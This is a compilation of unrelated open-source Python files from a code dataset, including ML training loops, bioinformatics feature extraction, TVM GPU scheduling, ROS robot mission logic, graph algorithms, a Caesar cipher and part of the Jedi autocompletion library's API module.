if HAS_WANDB_ACCOUNT:
wandb.init(entity='ilab', project=PROJECT, id=wandb_run_id)
else:
wandb.init(id=wandb_run_id)
remain_steps = max(NUM_ITER - checkpoint.step.numpy(), 0)
pbar = tqdm(total=remain_steps, ncols=50)
for lr, hr in dataset.take(remain_steps):
checkpoint.step.assign_add(1)
steps = checkpoint.step.numpy()
loss = train_step(lr, hr)
wandb.log({"steps": steps, "loss": loss, "learning_rate": optimizer.lr(steps).numpy()})
pbar.set_description("loss={:.4f}, lr={:.1e}".format(loss, optimizer.lr(steps).numpy()))
pbar.update(1)
if steps % SAVE_STEPS == 0:
manager.save()
print("\n[*] save ckpt file at {}".format(manager.latest_checkpoint))
model.save(SAVE_MODEL_PATH)
if __name__ == '__main__':
main() | StarcoderdataPython |
3384715 | <filename>code/FeatureExtractionMode/BOW/BOW4vec.py
from .kmer_bow import km_bow
from .mismatch_bow import mismatch_bow
from .subsequence_bow import subsequence_bow
from .tng_bow import tng_bow
from .dr_bow import dr_bow
from .dt_bow import dt_bow
from ..utils.utils_write import vectors2files
from ..utils.utils_const import DNA, RNA, PROTEIN
def bow(input_file, category, words, sample_num_list, out_format, out_file_list, cur_dir, tm=False, **param_dict):
if category == 'DNA':
alphabet = DNA
elif category == 'RNA':
alphabet = RNA
else:
alphabet = PROTEIN
if words == 'Kmer':
bow_vectors = km_bow(input_file, k=param_dict['word_size'], alphabet=alphabet, rev_comp=False)
elif words == 'RevKmer':
bow_vectors = km_bow(input_file, k=param_dict['word_size'], alphabet=alphabet, rev_comp=True)
elif words == 'Mismatch':
bow_vectors = mismatch_bow(input_file, alphabet, k=param_dict['word_size'], m=param_dict['mis_num'])
elif words == 'Subsequence':
bow_vectors = subsequence_bow(input_file, alphabet, k=param_dict['word_size'], delta=param_dict['delta'])
elif words == 'Top-N-Gram':
bow_vectors = tng_bow(input_file, n=param_dict['top_n'], cur_dir=cur_dir, process_num=param_dict['cpu'])
elif words == 'DR':
bow_vectors = dr_bow(input_file, max_dis=param_dict['max_dis'])
elif words == 'DT':
bow_vectors = dt_bow(input_file, max_dis=param_dict['max_dis'], cur_dir=cur_dir, process_num=param_dict['cpu'])
else:
print('word segmentation method error!')
return False
if tm is False:
vectors2files(bow_vectors, sample_num_list, out_format, out_file_list)
else:
return bow_vectors
| StarcoderdataPython |
1722509 | <gh_stars>0
#Generate Fibonacci series of N terms
n=int(input("Enter The Limit:"))
f=0
s=1
if n<=0:
print("The requested series is",f)
else:
print(f)
print(s)
for x in range(2,n):
next=f+s
print(next)
f=s
s=next | StarcoderdataPython |
1624667 | <gh_stars>10-100
import tvm
import sys
from .schedule_state import RealScheduleState
from .utils import tile_axes, reorder_spatial_and_reduce_axes, get_need_tile, get_factors
from ..utils import ERROR, ASSERT, to_int, REFUSE
def schedule_cuda_allreduce(op, op_to_id, op_to_state, sch, tensors, subgraph, multi_entity, hd_config, debug=sys.stdout):
op_id = op_to_id[op]
op_state = op_to_state[op]
entity = multi_entity.entities[op_id]
skeleton = entity.schedule_skeleton
if skeleton.use_allreduce:
if not (hasattr(op, "reduce_axis") and len(op.reduce_axis) > 0):
ERROR("Bad allreduce decision, no reduce_axis!")
if op_state.buffer_output:
ERROR("Bad allreduce decision with buffer output")
###########################
# there are two cases
# 1. this op is compute_at
# 2. no compute_at
allreduce_entity = entity.allreduce
axis_id = allreduce_entity.parallel_parent_axis_id
ASSERT(axis_id >= 0 and axis_id < len(op.reduce_axis), "Can't find parallel axis id", axis_id)
# case 1
if op_state.compute_at:
consumer_op = op_state.compute_at_op
consumer_state = op_to_state[consumer_op]
# inherit the thread axis from consumer
op_state.binding = consumer_state.copy_binding_for_extents()
# we don't tile spatial axes any more
# but we still tile reduce axes
# before tile, we should correct some factors if necessary
reduce_need_tile = get_need_tile(allreduce_entity.reduce_need_tile)
ASSERT(reduce_need_tile[axis_id], "Bad reduce_need_tile in allreduce!")
# these factors are two-level
reduce_split_factors = get_factors(allreduce_entity.reduce_split_factor_entities)
use_factor = allreduce_entity.use_factor.choice
if op_state.binding["thread"]["x"]["extent"] > 0:
tx_extent = op_state.binding["thread"]["x"]["extent"]
if use_factor == 0:
reduce_split_factors[axis_id][0] = tx_extent
else:
reduce_split_factors[axis_id][1] = tx_extent
else:
if use_factor == 0:
tx_extent = reduce_split_factors[axis_id][0]
else:
tx_extent = reduce_split_factors[axis_id][1]
# tile
reduce_axis_map, reduce_split_axis_list, _ = tile_axes(
sch, op, sch[op].op.reduce_axis, reduce_need_tile, reduce_split_factors, use_factor==1)
_, reduce_leveled_axes = reorder_spatial_and_reduce_axes(sch, op, {}, [], reduce_split_axis_list)
tx = tvm.te.thread_axis("threadIdx.x")
if tx_extent <= 1:
# bad allreduce, refuse allredcue
# update the leaf axes and reduce leaf axes
op_state.leaf_axes["inner"] = [iv for iv in sch[op].op.axis]
op_state.leaf_axes_belong_to_op["inner"] = op
op_state.leaf_reduce_axes = reduce_leveled_axes
op_state.leaf_reduce_axes_op = op
else:
# do allreduce
if use_factor == 0:
axis = reduce_axis_map[axis_id][0]
else:
axis = reduce_axis_map[axis_id][1]
rf = sch.rfactor(op.output(0), axis)
sch[op].bind(sch[op].op.reduce_axis[0], tx)
sch[rf].compute_at(sch[op], sch[op].op.reduce_axis[0])
op_state.allreduce = True
op_state.rf = rf
# update the leaf axes and reduce leaf axes
op_state.leaf_axes["inner"] = [iv for iv in sch[op].op.axis]
op_state.leaf_axes_belong_to_op["inner"] = op
op_state.leaf_reduce_axes = reduce_leveled_axes
op_state.binding["thread"]["x"]["extent"] = tx_extent
op_state.leaf_reduce_axes_op = op
total_threads = 1
for th in op_state.binding["thread"].values():
if th["extent"] > 0:
total_threads *= th["extent"]
if total_threads > hd_config.max_threads:
REFUSE("Threads number exceeds limit: %d vs. %d." % (total_threads, hd_config.max_threads))
return
# case 2
else:
# tile and bind reduce axes
use_factor = allreduce_entity.use_factor.choice
reduce_need_tile = get_need_tile(allreduce_entity.reduce_need_tile)
reduce_split_factors = get_factors(allreduce_entity.reduce_split_factor_entities)
reduce_axis_map, reduce_split_axis_list, reduce_split_factor_list = \
tile_axes(sch, op, sch[op].op.reduce_axis, reduce_need_tile, reduce_split_factors, use_factor==1)
_, reduce_leveled_axes = reorder_spatial_and_reduce_axes(sch, op, {}, [], reduce_split_axis_list)
# update the reduce leaf axes
op_state.leaf_reduce_axes = reduce_leveled_axes
op_state.leaf_reduce_axes_op = op
# do allreduce
tx = tvm.te.thread_axis("threadIdx.x")
ASSERT(reduce_need_tile[axis_id], "Bad allredcue decision, forget to split reduce axis!")
if reduce_split_factors[axis_id][use_factor] <= 1:
# do not do allreduce
REFUSE("Allreduce with axis extent 1.")
else:
axis = reduce_axis_map[axis_id][use_factor]
tx_extent = reduce_split_factors[axis_id][use_factor]
rf = sch.rfactor(op.output(0), axis)
sch[op].bind(sch[op].op.reduce_axis[0], tx)
sch[rf].compute_at(sch[op], sch[op].op.reduce_axis[0])
# update the allredcue
op_state.allreduce = True
op_state.rf = rf
op_state.binding["thread"]["x"]["extent"] = tx_extent
total_threads = 1
for th in op_state.binding["thread"].values():
if th["extent"] > 0:
total_threads *= th["extent"]
if total_threads > hd_config.max_threads:
REFUSE("Threads number exceeds limit: %d vs. %d." % (total_threads, hd_config.max_threads))
# for spatial
need_tile = get_need_tile(allreduce_entity.need_tile)
split_factors = get_factors(allreduce_entity.split_factor_entities)
num_split_axis = 0
for v in need_tile:
if v:
num_split_axis += 1
# tile and bind axes
bx = tvm.te.thread_axis("blockIdx.x")
by = tvm.te.thread_axis("blockIdx.y")
bz = tvm.te.thread_axis("blockIdx.z")
if num_split_axis == 0:
# bind a dummy axis
need_tile[0] = True
axis_map, split_axis_list, split_factor_list = tile_axes(sch, op, sch[op].op.axis, need_tile, split_factors)
sch[op].bind(split_axis_list[0][0], bx)
# update the leaf axes
op_state.leaf_axes["block"] = [split_axis_list[0][0]]
op_state.leaf_axes["inner"] = [split_axis_list[0][1]]
op_state.leaf_axes_belong_to_op["block"] = op
op_state.leaf_axes_belong_to_op["inner"] = op
op_state.binding["block"]["x"]["extent"] = split_factor_list[0][0]
# op_state.kernel_scope = split_axis_list[0][0]
# op_state.kernel_scope_op = op
elif num_split_axis == 1:
axis_map, split_axis_list, split_factor_list = tile_axes(sch, op, sch[op].op.axis, need_tile, split_factors)
leveled_axes, _ = reorder_spatial_and_reduce_axes(sch, op, axis_map, split_axis_list, [])
sch[op].bind(split_axis_list[0][0], bx)
op_state.leaf_axes["block"] = leveled_axes[0]
op_state.leaf_axes["inner"] = leveled_axes[1]
op_state.leaf_axes_belong_to_op["block"] = op
op_state.leaf_axes_belong_to_op["inner"] = op
op_state.binding["block"]["x"]["extent"] = split_factor_list[0][0]
# op_state.kernel_scope = leveled_axes[0][0]
# op_state.kernel_scope_op = op
elif num_split_axis == 2:
axis_map, split_axis_list, split_factor_list = tile_axes(sch, op, sch[op].op.axis, need_tile, split_factors)
leveled_axes, _ = reorder_spatial_and_reduce_axes(sch, op, axis_map, split_axis_list, [])
sch[op].bind(split_axis_list[0][0], by)
sch[op].bind(split_axis_list[1][0], bx)
op_state.leaf_axes["block"] = leveled_axes[0]
op_state.leaf_axes["inner"] = leveled_axes[1]
op_state.leaf_axes_belong_to_op["block"] = op
op_state.leaf_axes_belong_to_op["inner"] = op
op_state.binding["block"]["y"]["extent"] = split_factor_list[0][0]
op_state.binding["block"]["x"]["extent"] = split_factor_list[1][0]
# op_state.kernel_scope = leveled_axes[0][0]
# op_state.kernel_scope_op = op
elif num_split_axis == 3:
axis_map, split_axis_list, split_factor_list = tile_axes(sch, op, sch[op].op.axis, need_tile, split_factors)
leveled_axes, _ = reorder_spatial_and_reduce_axes(sch, op, axis_map, split_axis_list, [])
sch[op].bind(split_axis_list[0][0], bz)
sch[op].bind(split_axis_list[1][0], by)
sch[op].bind(split_axis_list[2][0], bx)
op_state.leaf_axes["block"] = leveled_axes[0]
op_state.leaf_axes["inner"] = leveled_axes[1]
op_state.leaf_axes_belong_to_op["block"] = op
op_state.leaf_axes_belong_to_op["inner"] = op
op_state.binding["block"]["z"]["extent"] = split_factor_list[0][0]
op_state.binding["block"]["y"]["extent"] = split_factor_list[1][0]
op_state.binding["block"]["x"]["extent"] = split_factor_list[2][0]
# op_state.kernel_scope = leveled_axes[0][0]
# op_state.kernel_scope_op = op
else:
to_fuse = []
bz_extent = 1
ind = 0
while num_split_axis >= 3:
if need_tile[ind]:
need_tile[ind] = False
num_split_axis -= 1
to_fuse_axis = sch[op].op.axis[ind]
bz_extent *= to_int(to_fuse_axis.dom.extent)
to_fuse.append(to_fuse_axis)
ind += 1
if len(to_fuse) > 1:
fused_axis = sch[op].fuse(*to_fuse)
else:
fused_axis = to_fuse[0]
sch[op].bind(fused_axis, bz)
axis_map, split_axis_list, split_factor_list = tile_axes(sch, op, sch[op].op.axis, need_tile, split_factors)
leveled_axes, _ = reorder_spatial_and_reduce_axes(sch, op, axis_map, split_axis_list, [])
sch[op].bind(split_axis_list[0][0], by)
sch[op].bind(split_axis_list[1][0], bx)
op_state.leaf_axes["block"] = [fused_axis] + leveled_axes[0]
op_state.leaf_axes["inner"] = leveled_axes[1]
op_state.leaf_axes_belong_to_op["block"] = op
op_state.leaf_axes_belong_to_op["inner"] = op
op_state.binding["block"]["z"]["extent"] = bz_extent
op_state.binding["block"]["y"]["extent"] = split_factor_list[0][0]
op_state.binding["block"]["x"]["extent"] = split_factor_list[1][0]
# op_state.kernel_scope = fused_axis
# op_state.kernel_scope_op = op
return
else:
return | StarcoderdataPython |
35909 | # -*- coding: utf-8 -*-
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from nailgun import consts
from nailgun.test.base import EnvironmentManager
from nailgun.test.performance import base
class NodeGroupOperationsLoadTest(base.BaseUnitLoadTestCase):
@classmethod
def setUpClass(cls):
super(NodeGroupOperationsLoadTest, cls).setUpClass()
cls.env = EnvironmentManager(app=cls.app, session=cls.db)
cls.env.upload_fixtures(cls.fixtures)
cls.cluster = cls.env.create_cluster(
api=False,
net_provider=consts.CLUSTER_NET_PROVIDERS.neutron,
net_segment_type=consts.NEUTRON_SEGMENT_TYPES.gre,
)
cls.group = cls.env.create_node_group()
cls.env.create_nodes(cls.NODES_NUM, cluster_id=cls.cluster['id'])
@base.evaluate_unit_performance
def test_node_group_collection_retrieve(self):
func = functools.partial(
self.get_handler,
'NodeGroupCollectionHandler',
)
self.check_time_exec(func)
@base.evaluate_unit_performance
def test_node_group_collection_create(self):
func = functools.partial(
self.post_handler,
'NodeGroupCollectionHandler',
{
'cluster_id': self.cluster.id,
'name': 'test_group',
}
)
self.check_time_exec(func)
| StarcoderdataPython |
3340340 | #! /usr/bin/python3
# -*- coding: utf-8 -*-
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, cmspy'
__credits__ = ['<NAME>']
__maintainer__ = 'Alan'
__email__ = '<EMAIL>'
__status__ = 'Production'
__all__ = [
'to_skycoord',
'radec2lmn'
]
import numpy as np
from astropy.coordinates import (
SkyCoord
)
import astropy.units as u
# ============================================================= #
# ------------------------ to_skycoord ------------------------ #
# ============================================================= #
def to_skycoord(coord):
"""
"""
ra, dec = coord
return SkyCoord(
ra,
dec,
unit='deg',
frame='icrs'
)
# ============================================================= #
# ============================================================= #
# ------------------------- radec2lmn ------------------------- #
# ============================================================= #
def radec2lmn(skycoord, phase_center):
""" Convert equatorial coordinates of a source to image
domain coordinates, namely (l, m, n). Particularly useful
while predicting visibilities.
:param skycoord:
Equatorial coordinates of the source to be converted
into image domain (l, m, n) coordinates.
:type skycoord:
`tuple` or :class:`astropy.coordinates.SkyCoord`
:param phase_center:
Phase center of the observation.
:type phase_center:
`tuple` or :class:`astropy.coordinates.SkyCoord`
:returns: (l, m, n) coordinates
:rtype: `tuple`
:Example:
>>> from cmspy.Astro import radec2lmn
>>> radec2lmn(
skycoord=(299.8681, 40.7339),
phase_center=(0, 90)
)
"""
if not isinstance(skycoord, SkyCoord):
skycoord = to_skycoord(skycoord)
if not isinstance(phase_center, SkyCoord):
phase_center = to_skycoord(phase_center)
r = skycoord.ra.rad
d = skycoord.dec.rad
r0 = phase_center.ra.rad
d0 = phase_center.dec.rad
dr = r - r0
l = np.cos(d)*np.sin(dr)
m = np.sin(d)*np.cos(d0) -\
np.cos(d)*np.sin(d0)*np.cos(dr)
n = np.sqrt(1 - l**2. - m**2.)
return l, m, n
# ============================================================= #
| StarcoderdataPython |
48953 | <reponame>WatsonWangZh/CodingPractice
# There are n cities connected by m flights.
# Each flight starts from city u and arrives at v with a price w.
# Now given all the cities and flights,
# together with starting city src and the destination dst,
# your task is to find the cheapest price from src to dst with up to k stops.
# If there is no such route, output -1.
# Example 1:
# Input:
# n = 3, edges = [[0,1,100],[1,2,100],[0,2,500]]
# src = 0, dst = 2, k = 1
# Output: 200
# Explanation:
# The graph looks like this:
# The cheapest price from city 0 to city 2 with at most 1 stop costs 200, as marked red in the picture.
# Example 2:
# Input:
# n = 3, edges = [[0,1,100],[1,2,100],[0,2,500]]
# src = 0, dst = 2, k = 0
# Output: 500
# Explanation:
# The graph looks like this:
# The cheapest price from city 0 to city 2 with at most 0 stop costs 500, as marked blue in the picture.
# Constraints:
# The number of nodes n will be in range [1, 100], with nodes labeled from 0 to n - 1.
# The size of flights will be in range [0, n * (n - 1) / 2].
# The format of each flight will be (src, dst, price).
# The price of each flight will be in the range [1, 10000].
# k is in the range of [0, n - 1].
# There will not be any duplicated flights or self cycles.
# M1. DFS
import collections
class Solution:
def findCheapestPrice(self, n: int, flights: List[List[int]], src: int, dst: int, K: int) -> int:
graph = collections.defaultdict(dict)
for u, v, e in flights:
graph[u][v] = e
visited = [0] * n
res = [float('inf')]
# python在递归函数中的传参问题
# https://blog.csdn.net/li123_123_/article/details/99203165
self.dfs(graph, src, dst, K + 1, 0, visited, res)
return -1 if res[0] == float('inf') else res[0]
def dfs(self, graph, src, dst, k, cost, visited, res):
if src == dst:
res[0] = cost
return
if k == 0:
return
for v, e in graph[src].items():
if visited[v]: continue
if cost + e > res[0]: continue
visited[v] = 1
self.dfs(graph, v, dst, k - 1, cost + e, visited, res)
visited[v] = 0
# M2. BFS
class Solution:
def findCheapestPrice(self, n: int, flights: List[List[int]], src: int, dst: int, K: int) -> int:
graph = collections.defaultdict(dict)
for u, v, e in flights:
graph[u][v] = e
res = float('inf')
que = collections.deque()
que.append((src, 0))
step = 0
while que:
size = len(que)
for i in range(size):
cur, cost = que.popleft()
if cur == dst:
res = min(res, cost)
for v, w in graph[cur].items():
if cost + w > res:
continue
que.append((v, cost + w))
if step > K: break
step += 1
return -1 if res == float('inf') else res
| StarcoderdataPython |
15782 | #!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist, TransformStamped
from std_msgs.msg import String
from enum import Enum
import tf2_ros
import math
class mission_states(Enum):
STOP = -1
SUBMERGE = 0
MOVE_TO_GATE = 1
MOVE_THROUGH_GATE = 2
def checkTolerance(current, wanted):
tolerance = 0.1
return current < wanted + tolerance and current > wanted - tolerance
def mission():
rospy.init_node('mission_controller', anonymous=True)
state = mission_states.SUBMERGE
goal_pub = rospy.Publisher('wolf_control/goal', Twist, queue_size=10)
state_pub = rospy.Publisher('wolf_control/mission_state', String, queue_size=10)
tf_buffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tf_buffer)
rate = rospy.Rate(10) # 10hz
submerge_depth = -1.5
timer = 0
saved_goal = None
while not rospy.is_shutdown():
try:
odom: TransformStamped = tf_buffer.lookup_transform("odom", "base_link", rospy.Time(0))
if state == mission_states.STOP:
goal = Twist()
goal.linear.z = submerge_depth
goal_pub.publish(goal)
if state == mission_states.SUBMERGE:
goal = Twist()
goal.linear.z = submerge_depth
goal.angular.z = odom.transform.rotation.z
goal_pub.publish(goal)
if checkTolerance(odom.transform.translation.z, submerge_depth):
state = mission_states.MOVE_TO_GATE
timer = 0
saved_goal = None
elif state == mission_states.MOVE_TO_GATE:
gate_vector: TransformStamped = tf_buffer.lookup_transform("odom", "gate", rospy.Time(0))
goal = Twist()
goal.linear.x = gate_vector.transform.translation.x * 0.1
goal.linear.y = gate_vector.transform.translation.y * 0.1
goal.linear.z = submerge_depth
goal_pub.publish(goal)
if timer > 80:
saved_goal = goal
state = mission_states.MOVE_THROUGH_GATE
timer = 0
elif state == mission_states.MOVE_THROUGH_GATE:
goal_pub.publish(saved_goal)
if timer > 170:
timer = 0
saved_goal = None
state = mission_states.STOP
timer += 1
state_pub.publish(state.name)
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.logerr("mission_code: error finding frame")
rate.sleep()
if __name__ == '__main__':
try:
mission()
except rospy.ROSInterruptException:
pass
| StarcoderdataPython |
11193 | <reponame>hurschler/pig-face-recognition
import logging.config
import util.logger_init
import numpy as np
import tensorflow as tf
from sklearn.metrics import confusion_matrix
from util.tensorboard_util import plot_confusion_matrix, plot_to_image
from tensorflow.python.keras.callbacks_v1 import TensorBoard
from keras import backend as K
class MlModel:
def get_model(self):
return self.model
def summary_print(self):
self.model.summary()
# Define your scheduling function
def scheduler(self, epoch):
return 0.001 * 0.95 ** epoch
def log_confusion_matrix(self, epoch, logs):
# Use the model to predict the values from the test_images.
test_pred_raw = self.model.predict(self.ml_data.x_test)
test_pred = np.argmax(test_pred_raw, axis=1)
# Calculate the confusion matrix using sklearn.metrics
cm = confusion_matrix(self.ml_data.y_test, test_pred)
figure = plot_confusion_matrix(cm, class_names=self.ml_data.pig_dict.values())
cm_image = plot_to_image(figure)
# Log the confusion matrix as an image summary.
with self.file_writer_cm.as_default():
tf.summary.image("Confusion Matrix", cm_image, step=epoch)
# Define TensorBoard callback child class
class LRTensorBoard(TensorBoard):
def __init__(self, log_dir, **kwargs): # add other arguments to __init__ if you need
super().__init__(log_dir=log_dir, **kwargs)
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
logs.update({'lr': K.eval(self.model.optimizer.lr)})
super().on_epoch_end(epoch, logs)
| StarcoderdataPython |
1634431 | <gh_stars>1-10
import string
def ceaser(plaintext, shift, mode='encode'):
'''
Ceaser cipher encoder and decoder.
:param plaintext: bytes
:param shift: int, Number of characters to shift by.
:param mode: 'encode' from plain to cipher, 'decode' from cipher to plain.
:return: bytes
'''
if type(plaintext) is not bytes:
raise TypeError('plaintext must be bytes.')
alphabet = string.ascii_lowercase.encode()
if mode == 'encode':
shifted_alphabet = alphabet[shift:] + alphabet[:shift]
elif mode == 'decode':
shift *= -1
shifted_alphabet = alphabet[shift:] + alphabet[:shift]
table = bytes.maketrans(alphabet, shifted_alphabet)
return plaintext.translate(table)
def groups(seq, length):
'''
:param seq: A slicable object like string or list.
:param length: The length of the groups
:return:
'''
for i in range(0, len(seq), length):
# print(i)
yield seq[i:i + length]
def hexbytes_to_bytestr(bytes_data):
l = list(map(lambda x: chr(int(x, 16)).encode(), groups(bytes_data, 2)))
s = b''.join(l)
return s
| StarcoderdataPython |
3258568 | <filename>bioprocs/tabix.py
from pyppl import Proc, Box
#from .utils import helpers, runcmd
from . import params
"""
@name:
pTabix
@description:
Use tabix to extract information.
@input:
`infile`: a local or remote file
`region`: a region or a file containing regions
@output:
`outfile:file`: The information extracted from the input file
@args:
`tabix`: The path to `tabix`
`params`: Other params for `tabix`
"""
pTabix = Proc(desc = 'Use tabix to extract information.')
pTabix.input = "infile, region"
pTabix.output = "outfile:file:{{i.infile | fn | fn}}-{{job.index}}{% if i.infile.endswith('.gz') %}{{i.infile | fn | ext}}{% else %}{{i.infile | ext}}{% endif %}"
pTabix.args.tabix = params.tabix.value
pTabix.args.params = Box(h = True)
pTabix.lang = params.python.value
pTabix.script = "file:scripts/tabix/pTabix.py"
"""
@name:
pTabixIndex
@description:
Generate tabix index file.
@input:
`infile:file`: the input file
- Could be bgzipped.
@output:
`outfile:file`: The bgzipped file
`outidx:file`: The tabix index file
@args:
`tabix`: The path to `tabix`
`params`: Other params for `tabix`
"""
pTabixIndex = Proc(desc = 'Generate tabix index file')
pTabixIndex.input = "infile:file"
pTabixIndex.output = [
"outfile:file:{{i.infile | bn}}{% if args.gz %}.gz{% endif %}",
"outidx:file:{{i.infile | bn}}{% if args.gz %}.gz{% endif %}.tbi"
]
pTabixIndex.args.gz = True
pTabixIndex.args.tabix = params.tabix.value
pTabixIndex.args.params = Box()
pTabixIndex.lang = params.python.value
pTabixIndex.script = "file:scripts/tabix/pTabixIndex.py" | StarcoderdataPython |
4840406 | <filename>vinplots/_style/__init__.py<gh_stars>0
from ._funcs._modify_axis_spines import _modify_axis_spines as modify_spines | StarcoderdataPython |
1676752 | """
The API basically only provides one class. You can create a :class:`Script` and
use its methods.
Additionally you can add a debug function with :func:`set_debug_function`.
Alternatively, if you don't need a custom function and are happy with printing
debug messages to stdout, simply call :func:`set_debug_function` without
arguments.
.. warning:: Please, note that Jedi is **not thread safe**.
"""
import os
import sys
import warnings
import parso
from parso.python import tree
from jedi._compatibility import force_unicode, is_py3
from jedi.parser_utils import get_executable_nodes
from jedi import debug
from jedi import settings
from jedi import cache
from jedi.api import classes
from jedi.api import interpreter
from jedi.api import helpers
from jedi.api.completion import Completion
from jedi.api.environment import InterpreterEnvironment
from jedi.api.project import get_default_project
from jedi.evaluate import Evaluator
from jedi.evaluate import imports
from jedi.evaluate import usages
from jedi.evaluate.arguments import try_iter_content
from jedi.evaluate.helpers import get_module_names, evaluate_call_of_leaf
from jedi.evaluate.sys_path import transform_path_to_dotted
from jedi.evaluate.filters import TreeNameDefinition, ParamName
from jedi.evaluate.syntax_tree import tree_name_to_contexts
from jedi.evaluate.context import ModuleContext
from jedi.evaluate.context.iterable import unpack_tuple_to_dict
# Jedi uses lots and lots of recursion. By setting this a little bit higher, we
# can remove some "maximum recursion depth" errors.
sys.setrecursionlimit(3000)
class Script(object):
"""
A Script is the base for completions, goto or whatever you want to do with
|jedi|.
You can either use the ``source`` parameter or ``path`` to read a file.
Usually you're going to want to use both of them (in an editor).
The script might be analyzed in a different ``sys.path`` than |jedi|:
- if `sys_path` parameter is not ``None``, it will be used as ``sys.path``
for the script;
- if `sys_path` parameter is ``None`` and ``VIRTUAL_ENV`` environment
variable is defined, ``sys.path`` for the specified environment will be
guessed (see :func:`jedi.evaluate.sys_path.get_venv_path`) and used for
the script;
- otherwise ``sys.path`` will match that of |jedi|.
:param source: The source code of the current file, separated by newlines.
:type source: str
:param line: The line to perform actions on (starting with 1).
:type line: int
:param column: The column of the cursor (starting with 0).
:type column: int
:param path: The path of the file in the file system, or ``''`` if
it hasn't been saved yet.
:type path: str or None
:param encoding: The encoding of ``source``, if it is not a
``unicode`` object (default ``'utf-8'``).
:type encoding: str
:param sys_path: ``sys.path`` to use during analysis of the script
:type sys_path: list
:param environment: TODO
:type environment: Environment
"""
def __init__(self, source=None, line=None, column=None, path=None,
encoding='utf-8', sys_path=None, environment=None):
self._orig_path = path
# An empty path (also empty string) should always result in no path.
self.path = os.path.abspath(path) if path else None
if source is None:
# TODO add a better warning than the traceback!
with open(path, 'rb') as f:
source = f.read()
# Load the Python grammar of the current interpreter.
self._grammar = parso.load_grammar()
if sys_path is not None and not is_py3:
sys_path = list(map(force_unicode, sys_path))
# Load the Python grammar of the current interpreter.
project = get_default_project(
os.path.dirname(self.path)if path else os.getcwd()
)
# TODO deprecate and remove sys_path from the Script API.
if sys_path is not None:
project._sys_path = sys_path
self._evaluator = Evaluator(
project, environment=environment, script_path=self.path
)
debug.speed('init')
self._module_node, source = self._evaluator.parse_and_get_code(
code=source,
path=self.path,
encoding=encoding,
cache=False, # No disk cache, because the current script often changes.
diff_cache=settings.fast_parser,
cache_path=settings.cache_directory,
)
debug.speed('parsed')
self._code_lines = parso.split_lines(source, keepends=True)
self._code = source
line = max(len(self._code_lines), 1) if line is None else line
if not (0 < line <= len(self._code_lines)):
raise ValueError('`line` parameter is not in a valid range.')
line_string = self._code_lines[line - 1]
line_len = len(line_string)
if line_string.endswith('\r\n'):
line_len -= 1
if line_string.endswith('\n'):
line_len -= 1
column = line_len if column is None else column
if not (0 <= column <= line_len):
raise ValueError('`column` parameter (%d) is not in a valid range '
'(0-%d) for line %d (%r).' % (
column, line_len, line, line_string))
self._pos = line, column
self._path = path
cache.clear_time_caches()
debug.reset_time()
def _get_module(self):
name = '__main__'
if self.path is not None:
import_names = transform_path_to_dotted(self._evaluator.get_sys_path(), self.path)
if import_names is not None:
name = '.'.join(import_names)
module = ModuleContext(
self._evaluator, self._module_node, self.path,
code_lines=self._code_lines
)
imports.add_module_to_cache(self._evaluator, name, module)
return module
def __repr__(self):
return '<%s: %s %r>' % (
self.__class__.__name__,
repr(self._orig_path),
self._evaluator.environment,
)
def completions(self):
"""
Return :class:`classes.Completion` objects. Those objects contain
information about the completions, more than just names.
:return: Completion objects, sorted by name and __ comes last.
:rtype: list of :class:`classes.Completion`
"""
debug.speed('completions start')
completion = Completion(
self._evaluator, self._get_module(), self._code_lines,
self._pos, self.call_signatures
)
completions = completion.completions()
def iter_import_completions():
for c in completions:
tree_name = c._name.tree_name
if tree_name is None:
continue
definition = tree_name.get_definition()
if definition is not None \
and definition.type in ('import_name', 'import_from'):
yield c
if len(list(iter_import_completions())) > 10:
# For now disable completions if there's a lot of imports that
# might potentially be resolved. This is the case for tensorflow
# and has been fixed for it. This is obviously temporary until we
# have a better solution.
self._evaluator.infer_enabled = False
debug.speed('completions end')
return completions
def goto_definitions(self):
"""
Return the definitions of a the path under the cursor. goto function!
This follows complicated paths and returns the end, not the first
definition. The big difference between :meth:`goto_assignments` and
:meth:`goto_definitions` is that :meth:`goto_assignments` doesn't
follow imports and statements. Multiple objects may be returned,
because Python itself is a dynamic language, which means depending on
an option you can have two different versions of a function.
:rtype: list of :class:`classes.Definition`
"""
leaf = self._module_node.get_name_of_position(self._pos)
if leaf is None:
leaf = self._module_node.get_leaf_for_position(self._pos)
if leaf is None:
return []
context = self._evaluator.create_context(self._get_module(), leaf)
definitions = helpers.evaluate_goto_definition(self._evaluator, context, leaf)
names = [s.name for s in definitions]
defs = [classes.Definition(self._evaluator, name) for name in names]
# The additional set here allows the definitions to become unique in an
# API sense. In the internals we want to separate more things than in
# the API.
return helpers.sorted_definitions(set(defs))
def goto_assignments(self, follow_imports=False, follow_builtin_imports=False):
"""
Return the first definition found, while optionally following imports.
Multiple objects may be returned, because Python itself is a
dynamic language, which means depending on an option you can have two
different versions of a function.
:param follow_imports: The goto call will follow imports.
:param follow_builtin_imports: If follow_imports is True will decide if
it follow builtin imports.
:rtype: list of :class:`classes.Definition`
"""
def filter_follow_imports(names, check):
for name in names:
if check(name):
new_names = list(filter_follow_imports(name.goto(), check))
found_builtin = False
if follow_builtin_imports:
for new_name in new_names:
if new_name.start_pos is None:
found_builtin = True
if found_builtin and not isinstance(name, imports.SubModuleName):
yield name
else:
for new_name in new_names:
yield new_name
else:
yield name
tree_name = self._module_node.get_name_of_position(self._pos)
if tree_name is None:
return []
context = self._evaluator.create_context(self._get_module(), tree_name)
names = list(self._evaluator.goto(context, tree_name))
if follow_imports:
def check(name):
return name.is_import()
else:
def check(name):
return isinstance(name, imports.SubModuleName)
names = filter_follow_imports(names, check)
defs = [classes.Definition(self._evaluator, d) for d in set(names)]
return helpers.sorted_definitions(defs)
def usages(self, additional_module_paths=(), **kwargs):
"""
Return :class:`classes.Definition` objects, which contain all
